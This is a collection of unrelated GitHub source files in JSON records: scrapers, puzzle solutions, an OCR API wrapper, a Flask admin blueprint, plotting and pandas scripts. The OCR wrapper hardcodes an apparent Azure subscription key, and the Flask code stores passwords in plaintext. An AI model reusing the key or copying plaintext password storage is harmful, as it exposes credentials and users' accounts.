list!\")\r\n # scrape_list = url_fill(spider_list, max_url_num, module_pattern)\r\n print(\"save file!\")\r\n url_save(spider_list, save_path)\r\n\r\n # file_path = r\"\" # waiting for remove repetition\r\n # exist_file_path = r\"\" # existing file path\r\n # filter_file_path = r\"\" # new file without repetition\r\n # remove_duplicate_urls(file_path, exist_file_path, filter_file_path)\r\n#\r\n# exitFlag = 0 # flag for url_queue\r\n# scrape_queue = url_lead(\"url_cnn.txt\")\r\n# print(\"start scrape\")\r\n# make_threads(1, scrape_queue, r\"\")\r\n# # make sure url queue is empty\r\n# while not scrape_queue.empty():\r\n# pass\r\n# exitFlag = 1\r\n\r\nif __name__ == 
\"__main__\":\r\n main()\r\n","repo_name":"xiyan524/MM-AVS","sub_path":"webCrawler.py","file_name":"webCrawler.py","file_ext":"py","file_size_in_byte":7559,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"20"} +{"seq_id":"35008671828","text":"n = int(raw_input())\ndic = {}\nfor x in range(n):\n lis = raw_input().split(\" \")\n nom = lis[0]\n num = abs(int(lis[1]))\n\n if num in dic:\n dic.pop(num)\n else:\n dic[num] = nom\nprint(\"FOREVER ALONE ones:\")\nfor x in reversed(dic.keys()):\n print(dic[x])\n","repo_name":"schiob/OnlineJudges","sub_path":"COJ/python/2752.py","file_name":"2752.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"17610416257","text":"import copy\r\nimport numpy as np\r\nimport sympy.utilities.iterables as sui\r\nimport io\r\nimport sys\r\n\r\nwith open(\"Input.txt\", \"r\") as f:\r\n\tline = f.readline().split(\",\")\r\n\tprogram = [int(i) for i in line]\r\n\r\ndef getargs(program, p, modes, argc):\r\n\targs = []\r\n\tfor i in range(argc):\r\n\t\targs.append(p+i+1 if len(modes) >= i + 1 and modes[i] == 1 else program[p+i+1])\r\n\treturn args\r\n\r\ndef computer(program, noun=None, verb=None, stdin=sys.stdin, stdout=sys.stdout):\r\n\tif not noun is None:\r\n\t\tprogram[1] = str(noun)\r\n\tif not verb is None:\r\n\t\tprogram[2] = str(verb)\r\n\tp = 0\r\n\tbuffer = []\r\n\twhile True:\r\n\t\topcode = int(str(program[p])[-min(2, len(str(program[p]))):])\r\n\t\tif len(str(program[p])) > 2:\r\n\t\t\tmodepart = str(program[p])[:len(str(program[p]))-2][::-1]\r\n\t\t\tmodes = [int(modepart[i]) for i in range(len(modepart))]\r\n\t\telse:\r\n\t\t\tmodes = []\r\n\t\tif opcode == 1: #Add\r\n\t\t\targs = getargs(program, p, modes, 3)\r\n\t\t\tprogram[args[2]] = program[args[0]] + program[args[1]]\r\n\t\t\tp += 4\r\n\t\telif opcode == 2: #Mult\r\n\t\t\targs = getargs(program, p, modes, 3)\r\n\t\t\tprogram[args[2]] = program[args[0]] * program[args[1]]\r\n\t\t\tp += 4\r\n\t\telif opcode == 3: #Read\r\n\t\t\twhile len(buffer) == 0:\r\n\t\t\t\tinp = stdin.readline()\r\n\t\t\t\tbuffer += [int(i) for i in inp.split(\" \")]\r\n\t\t\targs = getargs(program, p, modes, 1)\r\n\t\t\tprogram[args[0]] = buffer[0]\r\n\t\t\tbuffer = buffer[1:]\r\n\t\t\tp += 2\r\n\t\telif opcode == 4: #Write\r\n\t\t\targs = getargs(program, p, modes, 1)\r\n\t\t\tstdout.write(f\"{program[args[0]]}\\n\")\r\n\t\t\tp += 2\r\n\t\telif opcode == 5: #Jump-if-true\r\n\t\t\targs = getargs(program, p, modes, 2)\r\n\t\t\tif not program[args[0]] == 0:\r\n\t\t\t\tp = program[args[1]]\r\n\t\t\telse:\r\n\t\t\t\tp += 3\r\n\t\telif opcode == 6: #Jump-if-false\r\n\t\t\targs = getargs(program, p, modes, 2)\r\n\t\t\tif program[args[0]] == 0:\r\n\t\t\t\tp = program[args[1]]\r\n\t\t\telse:\r\n\t\t\t\tp += 3\r\n\t\telif opcode == 7: #Less than\r\n\t\t\targs = getargs(program, p, modes, 3)\r\n\t\t\tprogram[args[2]] = 1 if program[args[0]] < program[args[1]] else 0\r\n\t\t\tp += 4\r\n\t\telif opcode == 8: #Equals\r\n\t\t\targs = getargs(program, p, modes, 3)\r\n\t\t\tprogram[args[2]] = 1 if program[args[0]] == program[args[1]] else 0\r\n\t\t\tp += 4\r\n\t\telif opcode == 99: #Exit\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\traise RuntimeError(f\"Invalid opcode: {opcode}\")\r\n\treturn program[0]\r\n\r\ndef calcthrust(program, p):\r\n\toutp = 0\r\n\tfor i in p:\r\n\t\tstdin = io.StringIO(f\"{i}\\n{outp}\\n\")\r\n\t\tstdout = io.StringIO(\"\")\r\n\t\tcomputer(copy.copy(program), stdin=stdin, 
stdout=stdout)\r\n\t\toutp = int(stdout.getvalue())\r\n\treturn outp\r\n\r\nmaxval = 0\r\nfor p in sui.multiset_permutations(np.array([0, 1, 2, 3, 4])):\r\n\tmaxval = max(maxval, calcthrust(program, p))\r\nprint(maxval)","repo_name":"brentmaas/AdventOfCode2019","sub_path":"Day7/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"15528409973","text":"# -*- coding: utf-8 -*-\nimport requests\nfrom google.cloud import vision\nimport io\nimport simplejson as json\nfrom google.protobuf.json_format import MessageToJson\n\n\nclass Api_Call:\n def __init__(self, doc_path):\n self.doc_path = doc_path\n self.text_from_Azure_API()\n\n def text_from_Azure_API(self):\n\n # For Azure OCR API.\n\n subscription_key = \"8f6ad67b6c4344779e6148ddc48d96c0\"\n vision_base_url = \"https://madvisor.cognitiveservices.azure.com/vision/v2.0/\"\n text_recognition_url = vision_base_url + \"read/core/asyncBatchAnalyze\"\n\n data = open(self.doc_path, \"rb\").read()\n\n headers = {'Ocp-Apim-Subscription-Key': subscription_key,\n 'Content-Type': 'application/octet-stream'}\n\n response = requests.post(\n text_recognition_url,\n headers=headers,\n data=data)\n response.raise_for_status()\n\n analysis = {}\n poll = True\n while (poll):\n response_final = requests.get(\n response.headers[\"Operation-Location\"], headers=headers)\n analysis = response_final.json()\n # print(analysis)\n if (\"recognitionResults\" in analysis):\n poll = False\n if (\"status\" in analysis and analysis['status'] == 'Failed'):\n poll = False\n\n self.doc_analysis = analysis\n\n def page_wise_response(self, page_number):\n return [i for i in self.doc_analysis[\"recognitionResults\"]\n if (i[\"page\"] == page_number)][0]\n\n\ndef fetch_google_response(path):\n \"\"\"Detects text in the file.\"\"\"\n\n client = vision.ImageAnnotatorClient()\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n\n conf_response = client.document_text_detection(image=image)\n conf_response = json.loads(MessageToJson(conf_response))\n\n return conf_response\n\n\ndef fetch_google_response2(path):\n \"\"\"Detects text in the file.\"\"\"\n\n client = vision.ImageAnnotatorClient()\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n response = client.text_detection(image=image)\n texts = response.text_annotations\n response = json.loads(MessageToJson(response))\n\n return response\n\n\n\n\n","repo_name":"Srinidhi-SA/mAdvisorProdML","sub_path":"SPARK_DOCKER/code/mAdvisor-api/ocr/ITE/scripts/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"71766063729","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\n\ndef createTrainingData():\n link = \"https://www.hbs.edu/mba/find-answers/Pages/default.aspx\"\n response = requests.get(link)\n soup = BeautifulSoup(response.text, \"html5lib\")\n\n questions = []\n for question in soup.find_all(\"dt\"):\n questions.append(question.get_text())\n\n answers = []\n for answer in soup.find_all(\"dd\"):\n answers.append(answer.get_text())\n\n TrainingData = pd.DataFrame(list(zip(questions, answers)), columns=['Question', 'Answer'])\n\n return 
TrainingData\n\n\n\n\nTrainingData=createTrainingData()\n","repo_name":"kvaibhav2009/FAQChatbot","sub_path":"FAQChatbot/FAQchatbot/ScrapeForDataset.py","file_name":"ScrapeForDataset.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"70227712690","text":"from flask import (\n Blueprint,\n url_for,\n request,\n redirect,\n render_template,\n flash,\n abort,\n jsonify\n)\n\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom sqlalchemy import desc, func\nimport json\nfrom config import login_manager, Session\nfrom models import User, Work, Project, Client\nfrom json import dumps\n\nimport datetime\n\nfrom earnings_metric_calculator import EarningsMetricCalculator\nfrom work_hours_metric_calculator import WorkHoursMetricCalculator\n\nadmin_blueprint = Blueprint(\"admin\", __name__)\n\n\n# todo add login setting later\n# todo ensure that there is a check if user is admin or not\n@admin_blueprint.route(\"/users/add\", methods=[\"POST\", \"GET\"])\n@login_required\ndef add_user():\n if not current_user.is_admin:\n return \"Access denied. You are not an admin.\"\n\n if request.method == \"GET\":\n return render_template(\"admin_add_user.html\")\n\n\n try:\n username = request.form[\"username\"]\n password = request.form[\"password1\"]\n first_name = request.form[\"first-name\"]\n last_name = request.form[\"last-name\"]\n email_address = request.form[\"email-address\"]\n is_admin = bool(request.form.get(\"is-admin\"))\n\n except KeyError as e:\n print(e)\n flash(\"At least one input was not filled in\", \"error\")\n return render_template(\"admin_add_user.html\")\n\n\n # check if a user with the inputted username alreadey exits or not\n #TODO don't store passwords literally - store hashed ones\n session = Session()\n existing_user = session.query(User).filter(User.username == username).first()\n\n if existing_user is not None:\n flash(\"There was an existing user with the same username\", \"error\")\n session.close()\n return render_template(\"admin_add_user.html\")\n\n\n session.add(User(username=username,\n password=password,\n first_name=first_name,\n last_name=last_name,\n email_address=email_address,\n is_working=False,\n is_admin=is_admin))\n session.commit()\n session.close()\n flash(\"User added successfully\", \"success\")\n return render_template(\"admin_add_user.html\")\n\n\n@admin_blueprint.route(\"/clients/add\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_client():\n if not current_user.is_admin:\n return \"Access denied. You are not an admin.\"\n\n if request.method == \"GET\":\n return render_template(\"admin_add_client.html\")\n\n\n try:\n client_name = request.form[\"client-name\"]\n\n except KeyError as e:\n print(e)\n flash(\"At least one input was not filled in\", \"error\")\n return render_template(\"admin_add_user.html\")\n\n\n # add client\n with Session() as session:\n session.add(Client(name=client_name))\n session.commit()\n\n flash(\"Client added successfully\", \"success\")\n return render_template(\"admin_add_client.html\")\n\n\n@admin_blueprint.route(\"/users\")\n@login_required\ndef show_users():\n if not current_user.is_admin:\n return \"Access denied. 
You are not an admin.\"\n\n # todo: use get_user_profile API\n session = Session()\n users = session.query(User).all()\n user_objects = [user.to_dict_without_password() for user in users]\n return render_template(\"check_users2.html\", users=user_objects)\n\n@admin_blueprint.route(\"/\")\n@login_required\ndef index():\n if not current_user.is_admin:\n return \"Access denied. You are not an admin.\"\n\n\n\n # get year and month of the oldest available data in the database\n\n min_available_year_and_time = get_min_available_year_and_month()\n\n return render_template(\"admin_index.html\",\n min_datetime=dumps(min_available_year_and_time)\n )\n\n@admin_blueprint.route(\"/test\", methods=[\"GET\"])\ndef test():\n return render_template(\"test/test_api.html\")\n\ndef get_min_available_year_and_month():\n with Session() as session:\n min_datetime_record = session.query(Work.start_datetime).order_by().limit(1).first()\n min_available_year_and_time = min_datetime_record[0]\n return min_available_year_and_time.date().isoformat()\n\n\n@admin_blueprint.route(\"/projects\", methods=[\"GET\"])\n@login_required\ndef get_projects():\n # servers a list of projects\n # todo create html for this\n # put an edit button\n pass\n\n@admin_blueprint.route(\"/projects/edit\", methods=[\"POST\", \"GET\"])\n@login_required\ndef edit_project():\n # todo add a page to modify the project (e.g. adding earnings)\n # todo create a project modifying page\n pass\n\n\n@admin_blueprint.route(\"/projects/add\", methods=[\"POST\", \"GET\"])\n@login_required\ndef add_project():\n # authentication\n if not current_user.is_admin:\n return \"Access denied. You are not an admin.\"\n\n # if method == get\n if request.method == \"GET\":\n return render_template(\"admin_add_project.html\")\n\n # input validation\n try:\n manager_id = int(request.form[\"manager-id\"])\n client_id = request.form.get(\"client-id\")\n client_info = (int(client_id) if isinstance(client_id, str) and client_id.isdigit() else client_id) or request.form.get(\"client-name\")\n start_date_raw = request.form[\"start-date\"]\n\n except:\n # print(e)\n flash(\"At least one input was not filled in\", \"error\")\n return render_template(\"admin_add_project.html\")\n\n\n # parse dates\n start_datetime = datetime.datetime.strptime(start_date_raw, \"%Y-%m-%d\")\n\n\n if isinstance(client_info, str):\n # need to create a new client & insert it to the DB\n with Session() as session:\n client = Client(name=client_info)\n session.add(client)\n session.commit()\n\n # get the client id\n client_id = client.id\n\n else:\n client_id = client_info\n\n # add project record\n with Session() as session:\n session.add(Project(client_id=client_id, manager_id=manager_id, start_datetime=start_datetime))\n session.commit()\n\n flash(\"Project added successfully\", \"success\")\n return render_template(\"admin_add_project.html\")\n\n","repo_name":"superleesa/simple_company_management_tool","sub_path":"admin_blueprint.py","file_name":"admin_blueprint.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"15438152575","text":"from cmath import inf\nimport sys\nfrom tarfile import LENGTH_NAME\nimport numpy\nimport argparse\n\ndef convertXtoInts(X, alphabetDict):\n newX = []\n for x in X:\n str = ''\n for a in x:\n if a in alphabetDict:\n str += alphabetDict[a]\n newX.append(str)\n return newX\n \n\ndef constructReversePrefixSortMatrix(X, alphabet):\n #Creates the Mx(N+1) matrix (A)\n M = 
len(X)\n    N = (0 if len(X) == 0 else len(X[0]))\n    A = numpy.empty(shape=[M, 1 if len(X) == 0 else N+1 ], dtype=int)\n\n    # fill in the first column of A with the identity permutation\n    for i in range(M):\n        A[i][0] = i\n\n    # iterate through the columns of A\n    for k in range(N):\n        # create a 2-D list to hold the positions of the sequences after sorting\n        a = []\n        for alph in range(len(alphabet)):\n            a.append([])\n\n        # bucket the indices of column k by the symbol each sequence has there\n        for i in A[:,k]:\n            pos = alphabet.index(X[i][k])\n            a[pos].append(i)\n\n        # column k+1 of A is the buckets concatenated in alphabet order\n        array = []\n        for sub in a:\n            array += sub\n\n        A[:,k+1] = array\n\n    return A\n\n\ndef constructYFromX(X, alphabet):\n    # creates the MxN matrix Y\n    M = len(X)\n    N = (0 if len(X) == 0 else len(X[0]))\n    Y = numpy.empty(shape=[M, 0 if len(X) == 0 else N ], dtype=int)\n\n    # create the reverse prefix sort matrix A\n    A = constructReversePrefixSortMatrix(X, alphabet)\n\n    # Y[i][j] is the symbol of sequence A[i][j] at column j\n    for i in range(M):\n        for j in range(N):\n            Y[i][j] = X[A[i][j]][j]\n\n    return Y\n\n\n\ndef constructXFromY(Y,alphabet):\n    # creates the MxN matrix X\n    X = numpy.empty(shape=[len(Y), 0 if len(Y) == 0 else len(Y[0]) ], dtype=int)\n\n    # rebuild A alongside X, column by column\n    A = numpy.zeros(shape=[len(X), 1 if len(X) == 0 else len(X[0])+1 ], dtype=int)\n\n    M = len(X)\n\n    # first column of A is the identity permutation\n    for i in range(M):\n        A[i][0] = i\n\n    # iterate through the columns of Y\n    for k in range(len(Y[0,:])):\n\n        # invert the permutation: place column k of Y back into X\n        for m in range(len(A[:,0])):\n            X[A[m][k]][k] = Y[m][k]\n\n        # make the next column of A by bucketing on the values in Y\n        a = []\n        for alph in range(len(alphabet)):\n            a.append([])\n\n        for i in range(len(Y[:,k])):\n            pos = alphabet.index(str(Y[i][k]))\n            a[pos].append(A[i][k])\n\n        # the next column of A is the buckets concatenated in alphabet order\n        array = []\n        for sub in a:\n            array += sub\n        A[:,k+1] = array\n\n    return list(map(lambda i : \"\".join(map(str, i)), X)) # convert back to a list of strings\n\ndef runLenEncode(string):\n    encoding = \"\" # stores the output string\n    i = 0\n    while i < len(string):\n        # count occurrences of the character at index `i`\n        count = 1\n        while i + 1 < len(string) and string[i] == string[i + 1]:\n            count = count + 1\n            i = i + 1\n        # append the count and the current character to the result\n        encoding += str(count) + string[i]\n        i = i + 1\n    return encoding\n\ndef compressYMat(Y,conversionAlph):\n    compressed=[]\n    keys=list(conversionAlph.keys())\n    values=list(conversionAlph.values())\n    for n in range(Y.shape[1]):\n        string=''\n        for y in range(len(Y[:,n])):\n            string += keys[values.index(str(Y[:,n][y]))]\n        compressed.append(runLenEncode(string))\n    return compressed\n\n\ndef main():\n    print(\"pbwt main\")\n    # test code\n    X = ['ACG', 'ACC', 'GAC', 'TCG', 'GGT', 'TTT', 'GTT']\n    conversionAlph = {'A':'0', 'C':'1', 'G':'2', 'T':'3'}\n    # note that the alphabet must contain the mapped symbols as strings\n    alph = ['0','1', '2', '3']\n\n    X = 
convertXtoInts(X, conversionAlph)\n print(X)\n #test code\n Y = constructYFromX(X, alph)\n # print(Y)\n #test code\n # print(constructXFromY(Y,alph))\n # print(compressYMat(Y,conversionAlph))\n\nif __name__ == '__main__':\n main()\n","repo_name":"amkram/haplotype-compression","sub_path":"pbwt.py","file_name":"pbwt.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21110490840","text":"from confapp import conf\nimport settings\n\nconf += settings\n\nimport pyforms\nfrom pyforms_gui.basewidget import BaseWidget\nfrom pyforms.controls import ControlButton\nfrom pyforms.controls import ControlText\nfrom pyforms.controls import ControlCheckBox\nfrom pyforms.controls import ControlLabel\n\nfrom genetics import Genetics\n\n\nclass Main(BaseWidget):\n \"\"\"\n parameters:\n selection_rate(0.1)\n mutation_rate(0.01)\n population_size(100)\n random_weight_range(1.0)\n max_generations(100)\n show_graphics(true)\n save_population(false)\n save_best(false)\n save_graph(true)\n \"\"\"\n\n def __init__(self):\n super(Main, self).__init__('Snake Machine Learning')\n self.selection_rate = ControlText(\"Selection Rate (0.001-0.999)\", default=\"0.1\")\n self.mutation_rate = ControlText(\"Mutation Rate (0.001-0.999)\", default=\"0.01\")\n self.population_size = ControlText(\"Population Size (20-1000)\", default=\"100\")\n self.random_weight_range = ControlText(\"Random Weight Range (0.1 - 1.0)\", default=\"1.0\")\n self.max_generations = ControlText(\"Max Generations (1 - ...)\", default=\"100\")\n\n self.show_graphics = ControlCheckBox(\"Show Graphics\", default=True)\n self.games_to_show = ControlText(\"Games to Show\", default=\"25\")\n self.grid_count = ControlText(\"Grid Count\", default=\"30\")\n self.grid_size = ControlText(\"Grid Size\", default=\"5\")\n\n self.save_population = ControlCheckBox(\"Save Population\")\n self.save_best = ControlCheckBox(\"Save Best\")\n self.save_graph = ControlCheckBox(\"Save Graph\", default=True)\n\n self.error = ControlLabel(\"\")\n self.start_button = ControlButton('Start Simulation')\n self.start_button.value = self.start_simulation\n\n self.formset = ['h1:Snake Machine Learning', 'h3:Machine Learning Parameters', 'selection_rate',\n 'mutation_rate',\n 'population_size', 'random_weight_range', 'max_generations',\n 'h3:Graphics Parameters', 'show_graphics', 'games_to_show', 'grid_count', 'grid_size',\n 'h3:Save Parameters', ('save_population', 'save_graph', 'save_best'),\n 'error', 'start_button']\n\n def start_simulation(self):\n print(self.save_population.value)\n if self.check_variables():\n Genetics(replay=False, runId=1, load_pop=False, selection_rate=float(self.selection_rate.value),\n mutation_rate=float(self.mutation_rate.value),\n population_size=int(self.population_size.value),\n random_weight_range=float(self.random_weight_range.value),\n max_generations=int(self.max_generations.value),\n show_graphics=self.show_graphics.value,\n games_to_show=int(self.games_to_show.value),\n grid_count=int(self.grid_count.value),\n grid_size=int(self.grid_size.value),\n save_population=self.save_population.value,\n save_graph=self.save_graph.value,\n save_best=self.save_best.value)\n\n def check_variable(self, name, value, min_value, max_value, variable_type):\n # integer\n if variable_type == 0:\n if self.isInt(value):\n if int(value) < min_value or int(value) > max_value:\n self.show_var_error(name, min_value, max_value, variable_type)\n return False\n else:\n 
self.show_error(name + \"needs to be an integer\")\n # float\n elif variable_type == 1:\n if self.isFloat(value):\n if float(value) <= min_value or float(value) >= max_value:\n self.show_var_error(name, min_value, max_value, variable_type)\n return False\n else:\n self.show_error(name + \"needs to be a float\")\n else:\n return False\n\n self.show_error(\" \")\n return True\n\n def check_variables(self):\n return (not self.check_variable(\"selection_rate\", self.selection_rate.value, 0, 1, 1)\n and not self.check_variable(\"mutation_rate\", self.mutation_rate.value, 0, 1, 1)\n and not self.check_variable(\"population_size\", self.population_size.value, 20, 1000, 0)\n and not self.check_variable(\"random_weight_range\", self.random_weight_range.value, 0.1, 1.0, 1)\n and not self.check_variable(\"max_generations\", self.max_generations.value, 1, -1, 0)\n and not self.check_variable(\"games_to_show\", self.games_to_show.value, 1, self.population_size.value, 0)\n and not self.check_variable(\"grid_count\", self.grid_count.value, 3, 10000, 0)\n and not self.check_variable(\"grid_size\", self.grid_size.value), 1, 1000, 0)\n\n def show_var_error(self, var, min_value, max_value, variable_type):\n self.show_error(var + \" must be between \" + str(min_value) + \" and \" + str(max_value))\n\n def show_error(self, message):\n self.error.value = message\n\n def isFloat(self, value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n def isInt(self, value):\n try:\n int(value)\n return True\n except ValueError:\n return False\n\n\nif __name__ == \"__main__\":\n pyforms.start_app(Main, geometry=(200, 200, 1, 1))\n","repo_name":"will-y/snake","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"71013663729","text":"N = int(input())\ndata = ''\nfor _ in range(N):\n data += str(input())\n\ndef binary_serch(data,N):\n left = 0\n right = len(data)-1\n while left <= right:\n mid = (left+right)//2\n if data[mid] == '#' and (data[mid+1] == '0' or mid == len(data)-1):\n break\n elif data[mid] == '0':\n right = mid - 1\n else:\n left = mid + 1\n a = mid // N\n b = mid % N\n print(a,b)\n\nbinary_serch(data,N)","repo_name":"hw2ny1/STUDY","sub_path":"minco/LEVEL 5/클라우드 데이터 백업.py","file_name":"클라우드 데이터 백업.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31868640123","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nol=[]\nth=[]\ncount1=0\ncount2=0\n#count3=0\n#count4=0\noutput1=[]\noutput2=[]\nper1=[]\nper2=[]\nglobal percentage1\nglobal percentage2\n\ndef wow(count1,count3,count4):\n percentage1=(count3/count1)*100\n print(\"TOTAL PERCENTAGE OL\",percentage1,\"%\")\n per1.append(percentage1)\n percentage2=(count4/count1)*100\n print(\"TOTAL PERCENTAGE TH\",percentage2,\"%\")\n per2.append(percentage2)\n return percentage1,percentage2\nfor col in range(3,60,12):\n cols=col+1\n ol=[]\n th=[]\n fo=open(\"B.csv\",'r')\n plot=csv.reader(fo)\n count1=0\n count3=0\n count4=0\n \n for row in plot:\n ol.append(int(row[col]))\n th.append(int(row[cols]))\n count1=count1+1 \n for i in ol:\n if(i<20):\n count3=count3+1\n print(count3)\n for j in th:\n if(j<20):\n count4=count4+1\n print(count4)\n output1.append(wow(count1,count3,count4))\n #output2.append(wow(count1,count3,count4)) 
\nprint(per1)\nprint(per2)\n#print(output1)\n#print(output2)\n\n\n#works to display only 2 digits after decimal\nper1 = list(np.around(np.array(per1),2))\nper2 = list(np.around(np.array(per2),2))\n\n\nsubjects=['DM', 'DELD', 'DSA', 'COA', 'OOP']\nlegends=['ONLINE','THEORY']\nlist3=np.arange(len(subjects))\nbarsticks=plt.bar(list3,per1,align='center',alpha=1,width=0.27)\nfor rect in barsticks:\n\theight=rect.get_height()\n\tplt.text(rect.get_x()+rect.get_width()/2,height,'%d'% int(height),ha='center')\nbarsticks=plt.bar(list3+0.27,per2,align='center',alpha=1,width=0.27)\nfor rect in barsticks:\n\theight=rect.get_height()\n\tplt.text(rect.get_x()+rect.get_width()/2,height,'%d'% int(height),ha='center')\n\n\nplt.legend(legends)\nplt.xticks(list3,subjects,ha='left')\nplt.tight_layout()\nplt.title('Visualization of Failed Percentage(Div-B)')\nplt.xlabel('Subjects(ONLINE VS THEORY EXAM)')\nplt.ylabel('Marks in percentage(APPROX)')\nplt.show()\n","repo_name":"Piyush-Awchar/Result_Analysis_in_Python","sub_path":"proj-prog/perofolth.py","file_name":"perofolth.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26932724324","text":"#coding=utf-8\nimport pandas as pd\nimport sys, io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\n\n# 设置控制台显示宽度\npd.set_option(\"display.width\", 1000)\n\noo = pd.read_csv(\"olympics.csv\",skiprows=4)\n# print(oo.head())\n\n\"\"\"\n1.In which events did Jesse Owens win a medal?,show events he take part in.\n\"\"\"\n# owens = oo[oo.Athlete.str.contains(\"OWENS, Jesse\")]\nowens = oo[oo.Athlete==\"OWENS, Jesse\"]\n# print(owens)\n\n# print(owens.Event.value_counts()) # 统计出Owens 参与的项目\n\n\n\"\"\"\n2.Which country has won men's gold medals in singles badminton over the years? Sort the results alphabetically by the player's names.\n\"\"\"\n\nmbs = oo[(oo.Gender==\"Men\")&(oo.Sport==\"Badminton\")&(oo.Event==\"singles\")&(oo.Medal==\"Gold\")]\n\nmbs1 = mbs.sort_values(by=\"Athlete\")\n# print(mbs1)\n\n\n\"\"\"\n3.Which three countries have won the most medals in recent years (from 1984 to 2008)?\n\"\"\"\nnoc = oo[(oo.Edition>=1984)&(oo.Edition<=2008)]\nmost3 = noc.NOC.value_counts().head(3)\nprint(most3)\n\n\n\"\"\"\n4.Display the male gold medal winners for the 100m sprint event over the years. \nList the results starting with the most recent. 
\nShow the Olympic City, Edition, Athlete and the country they represent.\n\"\"\"\n\nmgm = oo[(oo.Medal==\"Gold\")&(oo.Gender==\"Men\")&(oo.Event==\"100m\")]\nnew = mgm.sort_values(\"Edition\",ascending=False)[[\"City\",\"Edition\",\"Athlete\",\"NOC\"]]\nprint(new)\n# print(mgm1)\n\n\n\n","repo_name":"smallsharp/mPython","sub_path":"advanced/pandas使用/过关题.py","file_name":"过关题.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"521887202","text":"import param\n\nfrom holoviews.plotting.util import attach_streams\n\nfrom ...core import AdjointLayout, Empty, GridMatrix, GridSpace, HoloMap, NdLayout\nfrom ...core.options import Store\nfrom ...core.util import wrap_tuple\nfrom ...element import Histogram\nfrom ..plot import (\n CallbackPlot,\n DimensionedPlot,\n GenericAdjointLayoutPlot,\n GenericCompositePlot,\n GenericElementPlot,\n GenericLayoutPlot,\n)\nfrom .util import configure_matching_axes_from_dims, figure_grid\n\n\nclass PlotlyPlot(DimensionedPlot, CallbackPlot):\n\n backend = 'plotly'\n\n width = param.Integer(default=400)\n\n height = param.Integer(default=400)\n\n unsupported_geo_style_opts = []\n\n @property\n def state(self):\n \"\"\"\n The plotting state that gets updated via the update method and\n used by the renderer to generate output.\n \"\"\"\n return self.handles['fig']\n\n\n def _trigger_refresh(self, key):\n \"Triggers update to a plot on a refresh event\"\n if self.top_level:\n self.update(key)\n else:\n self.current_key = None\n self.current_frame = None\n\n\n def initialize_plot(self, ranges=None, is_geo=False):\n return self.generate_plot(self.keys[-1], ranges, is_geo=is_geo)\n\n\n def update_frame(self, key, ranges=None, is_geo=False):\n return self.generate_plot(key, ranges, is_geo=is_geo)\n\n\n\nclass LayoutPlot(PlotlyPlot, GenericLayoutPlot):\n\n hspacing = param.Number(default=120, bounds=(0, None))\n\n vspacing = param.Number(default=100, bounds=(0, None))\n\n adjoint_spacing = param.Number(default=20, bounds=(0, None))\n\n shared_axes = param.Boolean(default=True, doc=\"\"\"\n Whether axes ranges should be shared across the layout, if\n disabled switches axiswise normalization option on globally.\"\"\")\n\n def __init__(self, layout, **params):\n super().__init__(layout, **params)\n self.layout, self.subplots, self.paths = self._init_layout(layout)\n\n if self.top_level:\n self.traverse(lambda x: attach_streams(self, x.hmap, 2),\n [GenericElementPlot])\n\n def _get_size(self):\n rows, cols = self.layout.shape\n return cols*self.width*0.8, rows*self.height\n\n def _init_layout(self, layout):\n # Situate all the Layouts in the grid and compute the gridspec\n # indices for all the axes required by each LayoutPlot.\n layout_count = 0\n collapsed_layout = layout.clone(shared_data=False, id=layout.id)\n frame_ranges = self.compute_ranges(layout, None, None)\n frame_ranges = dict([(key, self.compute_ranges(layout, key, frame_ranges))\n for key in self.keys])\n layout_items = layout.grid_items()\n layout_dimensions = layout.kdims if isinstance(layout, NdLayout) else None\n layout_subplots, layouts, paths = {}, {}, {}\n for r, c in self.coords:\n # Get view at layout position and wrap in AdjointLayout\n key, view = layout_items.get((c, r) if self.transpose else (r, c), (None, None))\n view = view if isinstance(view, AdjointLayout) else AdjointLayout([view])\n layouts[(r, c)] = view\n paths[r, c] = key\n\n # Compute the layout type from shape\n layout_lens = 
